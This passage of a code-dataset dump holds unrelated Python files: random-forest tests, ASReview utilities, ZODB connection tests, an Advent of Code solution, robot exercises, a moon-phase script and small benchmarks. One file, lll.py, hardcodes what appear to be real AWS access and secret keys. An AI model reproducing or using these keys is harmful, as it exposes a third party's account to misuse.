0.85 # testing on training data\n\ndef test_inline_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees, 'myinline', func='myinline_predict(values, length)')\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 0.9 # testing on training data\n\n\ndef test_deduplicate_single_tree():\n nodes = [\n [ -1, 1, -1, -1 ],\n [ -1, 0, -1, -1 ],\n [ 2, 666, 0, 1 ],\n [ -1, 1, -1, -1 ], # dup leaf. idx=3\n [ 4, 333, 1, 3 ], # dup ref\n [ 5, 444, 2, 1],\n [ 6, 555, 4, 5],\n ]\n roots = [ 6 ]\n\n de_nodes, de_roots = emtrees.randomforest.remove_duplicate_leaves((nodes, roots))\n\n duplicates = 1\n assert len(de_roots) == len(roots)\n assert len(de_nodes) == len(nodes) - duplicates\n assert de_roots[0] == roots[0] - duplicates\n\ndef test_trees_to_dot():\n X, Y = datasets.make_classification(n_classes=2, n_samples=10, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n dot = trees.to_dot(name='ffoo')\n with open('tmp/trees.dot', 'w') as f:\n f.write(dot)\n","sub_path":"test/test_emtrees.py","file_name":"test_emtrees.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274332675","text":"# Copyright 2019 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.balance_strategies.full_sampling import FullSampleTD\nfrom asreview.balance_strategies.triple_balance import TripleBalanceTD\nfrom asreview.balance_strategies.undersampling import UndersampleTD\n\n\ndef get_balance_strategy(method, balance_param={},\n query_kwargs={\"query_src\": {}}):\n if method == \"simple\":\n td_obj = FullSampleTD(balance_param)\n elif method == \"triple_balance\":\n td_obj = TripleBalanceTD(balance_param, query_kwargs)\n elif method in [\"undersample\", \"undersampling\"]:\n td_obj = UndersampleTD(balance_param)\n else:\n raise ValueError(f\"Training data method {method} not found\")\n return td_obj.func_kwargs_descr()\n\n\ndef get_balance_with_settings(settings):\n \"\"\" Function to get data rebalancing method. \"\"\"\n\n method = getattr(settings, \"balance_strategy\", \"simple\")\n settings.balance_strategy = method\n\n func, settings.balance_kwargs, td_string = get_balance_strategy(\n method, settings.balance_param, settings.query_kwargs)\n return func, td_string\n\n\ndef get_balance_class(method):\n if method in [\"simple\", \"full\"]:\n return FullSampleTD\n if method in [\"triple\", \"triple_balance\"]:\n return TripleBalanceTD\n if method in [\"undersample\", \"undersampling\"]:\n return UndersampleTD\n","sub_path":"asreview/balance_strategies/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111908064","text":"Access_Key='AKIAI37VVOBFMLGQYA5A'\t\t\n\nSecret_Key='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'\t\t\n\t\t\nTag='aggtrends-20'\n\nfrom amazon.api import AmazonAPI\namazon = AmazonAPI(Access_Key, Secret_Key, Tag)\nproduct = amazon.lookup(ItemId='B01J4MF53Q')\nprint(product.reviews[1])\nprint(product.large_image_url)\n\n","sub_path":"media/uploads/2019/12/11/lll.py","file_name":"lll.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438224284","text":"# !/usr/bin/python3\n\nimport sys\n\ngene = sys.argv[1]\ndata = sys.argv[2]\n\nwith open(data, \"r\") as handles1, open(gene, \"r\") as handles2:\n l_book = [] \n for line1 in handles1:\n word = line1.strip().split(\"\\t\")\n for i in word:\n l_book.append(i)\n\n d_book = {}\n for j in range(0,len(l_book), 2):\n d_book[l_book[j]] = l_book[j+1]\n\n mylist = handles2.read().splitlines()\n for line2 in mylist :\n if line2 in d_book:\n print(line2 + \"\\t\" + d_book[line2])\n elif line2 not in d_book:\n print(line2 + \"\\t\" +\"NA\")\n","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492577030","text":"\"\"\"\n:Copyright: 2006-2019 Jochen Kupperschmidt\n:License: Modified BSD, see LICENSE for details.\n\"\"\"\n\nfrom byceps.services.orga import service as 
orga_service\n\nfrom tests.helpers import create_brand, create_user\n\n\ndef test_flag_changes(admin_app_with_db):\n brand = create_brand()\n\n user = create_user()\n admin = create_user('Admin')\n\n assert not orga_service.is_user_orga(user.id)\n\n flag = orga_service.add_orga_flag(brand.id, user.id, admin.id)\n\n assert orga_service.is_user_orga(user.id)\n\n orga_service.remove_orga_flag(flag, admin.id)\n\n assert not orga_service.is_user_orga(user.id)\n","sub_path":"tests/services/orga/test_service.py","file_name":"test_service.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363950746","text":"from scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\nplt.xkcd()\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 7))\n\nplt.grid(color='lightgray', linestyle='-', linewidth=0.5)\n\n# Random scatter of preferences\nrv = multivariate_normal.rvs(mean=(0.5, 0.2),\n cov=((0.25, 0.1),\n (0.1, 0.25)),\n size=80)\nax.scatter(rv[:, 0], rv[:, 1], c='darkgray', zorder=2)\n\n# Total preference decision line\nax.plot([1, -1], [-1, 1], ':', color='navy')\n\n# Labels etc.\nax.set(xlabel='Enjoyment of lunch delivery',\n ylabel=\"Enjoyment of co-workers' company\",\n xlim=(-1, 1), ylim=(-1, 1),\n xticks=[0], yticks=[0],\n xticklabels=[], yticklabels=[],\n title='Do you like free lunch?')\n\nax.text(-0.8, -0.2, \"There's no such thing!\", color='firebrick')\nax.text(0.4, 0.8, 'Sign me up!', color='navy')\n\nfig.set_tight_layout(True)\n\nplt.show()\n","sub_path":"do_you_like_free_lunch.py","file_name":"do_you_like_free_lunch.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121238372","text":"class Node:\n def __init__(self, v):\n self.v = v\n self.children = []\n\n\ndef readRelationData(fileName):\n relations = []\n with open(fileName) as f:\n # Read parent - child relations\n for line in f:\n rowData = line.split()\n p = int(rowData[0])\n c = int(rowData[1])\n relations.append((p, c))\n f.close()\n\n return relations\n\n\ndef reconstruct(relations):\n pareChildMap = {}\n root = None\n # Find root order and parent - children set\n for r in relations:\n p, c = r\n if p == c:\n # Init root node seperately\n root = Node(p)\n else:\n if p in pareChildMap:\n pareChildMap[p].append(c)\n else:\n pareChildMap[p] = [c]\n\n print(pareChildMap)\n # Do DFS\n stack = [root]\n while stack:\n node = stack.pop()\n pid = node.v\n if pid in pareChildMap:\n cValues = pareChildMap[pid]\n for cv in cValues:\n cNode = Node(cv)\n node.children.append(cNode)\n stack.append(cNode)\n\n return root\n\n\ndef printTree(root: Node):\n # BFS\n queue = [(root, 0)]\n preDepth = 0\n while queue:\n node, depth = queue.pop(0)\n if depth > preDepth:\n print('')\n\n print(node.v, end=' ')\n preDepth = depth\n for c in node.children:\n queue.append((c, depth + 1))\n\n print('')\n\n\nrelations = readRelationData('parentChildRelations')\ntree = reconstruct(relations)\nprintTree(tree)","sub_path":"Py_solution/consTreeWithChildParentRelation.py","file_name":"consTreeWithChildParentRelation.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241111572","text":"import multiprocessing\nimport threading\n\nimport mock\nimport pytest\nfrom ZODB.POSException import ConflictError\n\nimport sheraf\nimport tests\n\n\nclass Model(tests.UUIDAutoModel):\n 
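# minimal model: one plain attribute is all the connection tests below need\n    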
field = sheraf.SimpleAttribute()\n\n\ndef test_connection(sheraf_database):\n sheraf_database.connection = mock.Mock(side_effect=sheraf_database.connection)\n\n with sheraf.connection(commit=True):\n sheraf_database.connection.assert_called_with(\n commit=True,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n m = Model.create(field=\"foo\")\n\n @sheraf.connection()\n def read(mid):\n m = Model.read(mid)\n assert \"foo\" == m.field\n\n read(m.id)\n sheraf_database.connection.assert_called_with(\n commit=False,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n\n @sheraf.connection(commit=True, cache_minimize=True)\n def update(mid):\n m = Model.read(mid)\n assert \"foo\" == m.field\n m.field = \"bar\"\n\n update(m.id)\n sheraf_database.connection.assert_called_with(\n commit=True,\n cache_minimize=True,\n reuse=False,\n _trackeback_shift=2,\n )\n\n with sheraf.connection():\n sheraf_database.connection.assert_called_with(\n commit=False,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n\n m = Model.read(m.id)\n assert \"bar\" == m.field\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_current_connection(cacheMinimize, sheraf_database):\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n with sheraf.connection() as conn:\n assert sheraf.Database.current_connection() is conn\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n with sheraf.connection() as conn:\n assert sheraf.Database.current_connection() is conn\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_without_args(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n with sheraf.connection():\n m.field = \"yeah\"\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_without_args_and_with_exception(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n try:\n with sheraf.connection():\n m.field = \"yeah\"\n raise ValueError()\n except ValueError:\n pass\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_commit(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n with sheraf.connection(commit=True):\n m.field = \"yeah\"\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert \"yeah\" == m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_commit_and_exception(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n try:\n with sheraf.connection(commit=True):\n m.field = \"yeah\"\n raise ValueError()\n except ValueError:\n pass\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_cache_minimize(cacheMinimize, sheraf_database):\n with 
sheraf.connection(cache_minimize=True):\n pass\n\n assert cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_cache_minimize_and_exception(cacheMinimize, sheraf_database):\n try:\n with sheraf.connection(cache_minimize=True):\n raise ValueError()\n except ValueError:\n pass\n\n assert cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_database_name(cacheMinimize, sheraf_database, other_database):\n assert sheraf.Database.get(\"other_database\") != sheraf.Database.get()\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = True\n with sheraf.connection(database_name=\"other_database\") as c:\n assert \"data\" not in c.root()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_raise_exception(cacheMinimize, sheraf_database):\n with sheraf.connection():\n with pytest.raises(sheraf.exceptions.ConnectionAlreadyOpened):\n with sheraf.connection():\n pass # pragma: no cover\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_raise_exception_message(cacheMinimize, sheraf_database):\n with sheraf.connection():\n with pytest.raises(\n sheraf.exceptions.ConnectionAlreadyOpened,\n match=\"First connection was .* on .*{} at line\".format(__file__),\n ):\n with sheraf.connection():\n pass # pragma: no cover\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_on_two_databases_raise_exception(\n cacheMinimize, sheraf_database\n):\n other = sheraf.Database(\"memory://?database_name=other_database\")\n with sheraf.connection():\n with pytest.raises(sheraf.exceptions.ConnectionAlreadyOpened):\n with sheraf.connection(database_name=\"other_database\"):\n pass # pragma: no cover\n other.close()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_connection_closed_in_connection_context(cacheMinimize, sheraf_database):\n with sheraf.connection() as connection:\n connection.close()\n\n class CustomException(Exception):\n pass\n\n with pytest.raises(CustomException):\n with sheraf.connection(commit=True) as connection:\n connection.close()\n raise CustomException()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_database_context_manager(cacheMinimize):\n db = sheraf.Database()\n with db.connection() as connection:\n assert sheraf.Database.current_connection() is connection\n db.close()\n\n\ndef test_multithreading_database_connection(sheraf_zeo_database):\n with sheraf.connection(commit=True) as c:\n c.root.list = sheraf.types.LargeList()\n c.root.list.append(\"main\")\n\n class MyThread(threading.Thread):\n def run(self):\n with sheraf.connection(commit=True) as c:\n c.root.list.append(\"thread\")\n\n my_thread = MyThread()\n my_thread.start()\n my_thread.join(timeout=10)\n\n with sheraf.connection() as c:\n assert [\"main\", \"thread\"] == list(c.root.list)\n\n\ndef test_multiprocessing_database_connection(sheraf_zeo_database):\n with sheraf.connection(commit=True) as c:\n c.root.list = sheraf.types.LargeList()\n c.root.list.append(\"main\")\n\n class MyProcess(multiprocessing.Process):\n def __init__(self, uri):\n super().__init__()\n self.uri = uri\n\n def run(self):\n with pytest.raises(KeyError):\n sheraf.Database.get()\n\n db = sheraf.Database(self.uri)\n with sheraf.connection(commit=True) as conn:\n conn.root.list.append(\"process\")\n db.close()\n\n my_process = MyProcess(sheraf_zeo_database.uri)\n my_process.start()\n 
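# the child re-opens the database itself via the shared URI; connections are not shared across processes\n    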
my_process.join(timeout=10)\n assert 0 == my_process.exitcode\n\n with sheraf.connection() as c:\n assert [\"main\", \"process\"] == list(c.root.list)\n\n\ndef test_data_reading(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = True\n\n with sheraf.connection() as c1:\n assert c1.root()[\"data\"]\n\n with sheraf.connection(commit=True) as c2:\n c2.root()[\"data\"] = False\n\n assert c1.root()[\"data\"]\n\n with sheraf.connection() as c3:\n assert not c3.root()[\"data\"]\n\n\ndef test_transaction_managers(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection() as c1:\n with sheraf.connection() as c2:\n assert c1.transaction_manager != c2.transaction_manager\n\n\ndef test_conflict(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = sheraf.types.SmallList()\n\n with pytest.raises(ConflictError):\n with sheraf.connection(commit=True) as c1:\n c1.root()[\"data\"].append(\"connection1\")\n\n with sheraf.connection(commit=True) as c2:\n c2.root()[\"data\"].append(\"connection2\")\n\n\ndef test_get_current_connection_nested(sheraf_database, other_nested_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(sheraf.Database.DEFAULT_DATABASE_NAME) as conn_default:\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n assert conn_default == sheraf.Database.current_connection()\n\n with sheraf.connection(\"other_nested_database\") as conn_other:\n assert \"other_nested_database\" == sheraf.Database.current_name()\n assert conn_other == sheraf.Database.current_connection()\n\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n assert conn_default == sheraf.Database.current_connection()\n\n\ndef test_last_connection(sheraf_database):\n with sheraf.connection() as conn:\n assert conn == sheraf.Database.last_connection(sheraf_database)\n\n\ndef test_replace(sheraf_database):\n with sheraf.connection() as conn1:\n with sheraf.connection(reuse=True) as conn2:\n assert conn1 is conn2\n","sub_path":"tests/databases/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":10263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652945384","text":"# https://adventofcode.com/2020/day/25\n\nimport itertools\n\nfrom helpers import nth\n\nTEST = [5764801, 17807724]\n\nINPUT = [17607508, 15065270]\n\ndef transformed_values(subject):\n val = 1\n while True:\n yield val\n val = (val * subject) % 20201227\n\ndef transform(subject, loop_size):\n return nth(transformed_values(subject), loop_size)\n\ndef find_loop_size(pubkey):\n for loop_size, val in enumerate(transformed_values(7)):\n if val == pubkey:\n return loop_size\n\ndef test_find_loop_size():\n assert find_loop_size(5764801) == 8\n assert find_loop_size(17807724) == 11\n\ndef part1(*keys):\n loop1 = find_loop_size(keys[0])\n loop2 = find_loop_size(keys[1])\n ekey1 = transform(keys[0], loop2)\n ekey2 = transform(keys[1], loop1)\n assert ekey1 == ekey2\n return ekey1\n\ndef test_part1():\n assert part1(*TEST) == 14897079\n\nif __name__ == \"__main__\":\n ans = part1(*INPUT)\n print(f\"Part 1: {ans}\")\n","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20187735","text":"from cs1robots import 
*\r\n#load_world(\"worlds/hurdles1.wld\")\r\nload_world(\"worlds/hurdles2.wld\")\r\n#load_world(\"worlds/hurdles3.wld\")\r\n\r\nhubo = Robot()\r\n\r\nhubo.set_trace(\"blue\")\r\nhubo.set_pause(.2)\r\n\r\ndef turn_right():\r\n for i in range(3):\r\n hubo.turn_left() \r\n\r\ndef move_or_jump():\r\n while hubo.front_is_clear():\r\n hubo.move()\r\n if not hubo.front_is_clear():\r\n hubo_jump()\r\n\r\ndef hubo_jump():\r\n if not hubo.on_beeper():\r\n hubo.turn_left()\r\n hubo.move()\r\n turn_right()\r\n hubo.move()\r\n turn_right()\r\n hubo.move()\r\n hubo.turn_left()\r\n else:\r\n hubo.set_pause()\r\n\r\nwhile not hubo.on_beeper():\r\n move_or_jump()\r\n\r\n\r\n##def turn_right():\r\n## for i in range(3):\r\n## hubo.turn_left() \r\n##\r\n###hubo will curb right\r\n##def hubo_turn_right():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## turn_right()\r\n## hubo.move()\r\n## turn_right()\r\n##\r\n###hubo will curb left\r\n##def hubo_turn_left():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## hubo.turn_left()\r\n## hubo.move()\r\n## hubo.turn_left()\r\n##\r\n###hubo will pick beeper and move forward\r\n##def forward():\r\n## while hubo.front_is_clear():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## else:\r\n## hubo.move()\r\n##\r\n##while hubo.front_is_clear:\r\n## while hubo.left_is_clear: #modulize two lines together\r\n## forward()\r\n## hubo_turn_left()\r\n## forward()\r\n## hubo_turn_right()\r\n## if not hubo.left_is_clear(): #hubo will stop when reaching top\r\n## hubo.set_pause()\r\n","sub_path":"Week2/Hw2_p3.py","file_name":"Hw2_p3.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13271407","text":"#!/usr/bin/python\nfrom datetime import date\nfrom math import radians as rad,degrees as deg\n\nimport ephem\n\ng = ephem.Observer()\ng.name='Somewhere'\ng.lat=rad(47.35) # lat/long in decimal degrees\ng.long=rad(7.94)\n\nm = ephem.Moon()\n\ng.date = date.today()# local time zone, I'm in UTC+1\ng.date -= ephem.hour # always everything in UTC\n\nfor i in range(24*4): # compute position for every 15 minutes\n m.compute(g)\n\n nnm = ephem.next_new_moon(g.date)\n pnm = ephem.previous_new_moon(g.date)\n # for use w. 
    lunation = (g.date-pnm)/(nnm-pnm)\n    symbol = lunation*26\n    if symbol < 0.2 or symbol > 25.8:\n        symbol = '1'  # new moon\n    else:\n        symbol = chr(ord('A')+int(symbol+0.5)-1)\n\n
    print(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (ephem.localtime(g.date).time().strftime(\"%H:%M:%S\"), deg(m.alt), deg(m.az),\n                                      ephem.localtime(g.date).time().strftime(\"%H%M\"),\n                                      m.phase, symbol))\n    g.date += ephem.minute*15\n","sub_path":"moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374733472","text":"from datetime import timedelta\n\nfrom schematics.exceptions import ValidationError\n\nfrom openprocurement.api.constants import RELEASE_2020_04_19, WORKING_DAYS\nfrom openprocurement.api.validation import (\n    validate_data,\n    validate_json_data,\n    OPERATIONS,\n    _validate_accreditation_level,\n    _validate_accreditation_level_mode,\n    validate_tender_first_revision_date,\n)\nfrom openprocurement.api.utils import (\n    error_handler,\n    get_now,\n    raise_operation_error,\n    update_logging_context,\n    upload_objects_documents,\n)\nfrom openprocurement.tender.core.utils import calculate_tender_business_date, calculate_tender_date\nfrom openprocurement.tender.open.constants import POST_SUBMIT_TIME\n\n\n
def _validate_tender_period_start_date(data, period, working_days=False, calendar=WORKING_DAYS):\n    min_allowed_date = calculate_tender_date(\n        get_now(),\n        - timedelta(minutes=10),\n        tender=None,\n        working_days=working_days,\n        calendar=calendar\n    )\n    if min_allowed_date >= period.startDate:\n        raise ValidationError(\"tenderPeriod.startDate should be greater than current date\")\n\n\n
# complaint\ndef validate_submit_claim_time(request, **kwargs):\n    tender = request.validated[\"tender\"]\n    claim_submit_time = request.content_configurator.tender_claim_submit_time\n    claim_end_date = calculate_tender_business_date(tender.tenderPeriod.endDate, -claim_submit_time, tender)\n    if get_now() > claim_end_date:\n        raise_operation_error(\n            request,\n            \"Can submit claim not later than {duration.days} \"\n            \"full calendar days before tenderPeriod ends\".format(\n                duration=claim_submit_time\n            )\n        )\n\n\n
def validate_update_claim_time(request, **kwargs):\n    tender = request.validated[\"tender\"]\n    if get_now() > tender.enquiryPeriod.clarificationsUntil:\n        raise_operation_error(request, \"Can update claim only before enquiryPeriod.clarificationsUntil\")\n\n\n
# complaint documents\ndef validate_complaint_document_operation_not_in_allowed_status(request, **kwargs):\n    if request.validated[\"tender_status\"] not in [\"active.tendering\"]:\n        raise_operation_error(\n            request,\n            \"Can't {} document in current ({}) tender status\".format(\n                OPERATIONS.get(request.method), request.validated[\"tender_status\"]\n            ),\n        )\n\n\n
# contract\ndef validate_contract_update_with_accepted_complaint(request, **kwargs):\n    tender = request.validated[\"tender\"]\n    if any(\n        [\n            any([c.status == \"accepted\" for c in i.complaints])\n            for i in tender.awards\n            if i.lotID in [a.lotID for a in tender.awards if a.id == request.context.awardID]\n        ]\n    ):\n        raise_operation_error(request, \"Can't update contract with accepted complaint\")\n\n\n
def validate_accepted_complaints(request, **kwargs):\n    if any(\n        [\n            any([c.status == \"accepted\" for 
c in i.complaints])\n for i in request.validated[\"tender\"].awards\n if i.lotID == request.validated[\"award\"].lotID\n ]\n ):\n operation = OPERATIONS.get(request.method)\n raise_operation_error(request, \"Can't {} document with accepted complaint\".format(operation))\n\n\n# cancellation\ndef validate_not_only_unsuccessful_awards_or_qualifications(request, **kwargs):\n unsuccessful_statuses = {\"unsuccessful\", \"cancelled\"}\n tender = request.validated[\"tender\"]\n cancellation = request.validated[\"cancellation\"]\n # we use below getattr, so we can use validator bot for openua and openeu procedures\n items = tender.awards if tender.awards else getattr(tender, \"qualifications\", \"\")\n\n def raise_error():\n raise_operation_error(\n request,\n \"Can't perform cancellation if all {} are unsuccessful\".format(\n \"awards\" if tender.awards else \"qualifications\"\n ),\n )\n\n if not cancellation.relatedLot and tender.lots:\n # cancelling tender with lots\n # can't cancel tender if there is a lot, where\n active_lots = (i.id for i in tender.lots if i.status == \"active\")\n for lot_id in active_lots:\n item_statuses = {i.status for i in items if i.lotID == lot_id}\n if item_statuses and not item_statuses.difference(unsuccessful_statuses):\n raise_error()\n\n elif cancellation.relatedLot and tender.lots or not cancellation.relatedLot and not tender.lots:\n # cancelling lot or tender without lots\n statuses = {i.status for i in items if i.lotID == cancellation.relatedLot}\n if statuses and not statuses.difference(unsuccessful_statuses):\n raise_error()\n\n\n# post\ndef _validate_post_accreditation_level(request, **kwargs):\n tender = request.validated[\"tender\"]\n mode = tender.get(\"mode\", None)\n _validate_accreditation_level(request, tender.edit_accreditations, \"post\", \"creation\")\n _validate_accreditation_level_mode(request, mode, \"post\", \"creation\")\n\n\ndef validate_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_award_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_cancellation_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.tender).cancellations.model_class.complaints.model_class.posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_qualification_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": 
request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_complaint_post_complaint_type(request, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.type != \"complaint\":\n raise_operation_error(\n request, \"Can't submit or edit post in current ({}) complaint type\".format(\n complaint.type\n )\n )\n\n\ndef validate_complaint_post_complaint_status(request, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.status not in [\"pending\", \"accepted\"]:\n raise_operation_error(\n request, \"Can't submit or edit post in current ({}) complaint status\".format(\n complaint.status\n )\n )\n\n\ndef validate_complaint_post_review_date(request, calendar=WORKING_DAYS, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.status == \"accepted\":\n tender = request.validated[\"tender\"]\n post_end_date = calculate_tender_business_date(\n complaint.reviewDate, -POST_SUBMIT_TIME,\n tender=tender, working_days=True, calendar=calendar\n )\n if get_now() > post_end_date:\n raise_operation_error(\n request,\n \"Can submit or edit post not later than {duration.days} \"\n \"full business days before reviewDate\".format(\n duration=POST_SUBMIT_TIME\n )\n )\n\n\ndef validate_complaint_post_document_upload_by_author(request, **kwargs):\n if request.authenticated_role != request.context.author:\n request.errors.add(\"url\", \"role\", \"Can add document only by post author\")\n request.errors.status = 403\n raise error_handler(request)\n\n\ndef validate_complaint_post(request, **kwargs):\n validate_tender_first_revision_date(request, validation_date=RELEASE_2020_04_19)\n","sub_path":"src/openprocurement/tender/open/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":8553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95485378","text":"\"\"\"test pour voir l'apport de la vectorisation pour la fonction affectation\"\"\"\n\nfrom hmeans import *\nimport numpy as np\nfrom time import time\n\nnp.random.seed(7)\nC = np.array([[-1,0],\n [1,0],\n [0,1],\n [0,-1]])\nsigma_K = [3, 4, 5, 4.5]\nn_K = [15000, 11000, 7000, 8000]\n\nX = fabrique_donnees(C, sigma_K, n_K)\n\nt0 = time()\nclasse, I = affectation(X, C)\ntscal = time() - t0\nt0 = time()\nG = barycentrage(X, classe, 4)\ntbscal = time() - t0\n\nt0 = time()\nclasse_ref, I_ref = affectationv(X, C)\ntvec = time() - t0\nt0 = time()\nG_ref = barycentragev(X, classe_ref, 4)\ntbvec = time() - t0\n\nif np.all(classe == classe_ref) and np.allclose(I, I_ref) and np.allclose(G, G_ref):\n print(\" justesse : OK\")\nelse:\n print(\" justesse : pas OK\")\n \n\nprint(f' temps scalaire affectation = {tscal}')\nprint(f' temps vectoriel affectation = {tvec}')\nprint(f' scal/vec affectation= {tscal/tvec}')\n\nprint(f' temps scalaire barycentrage = {tbscal}')\nprint(f' temps vectoriel barycentrage = {tbvec}')\nprint(f' scal/vec barycentrage= 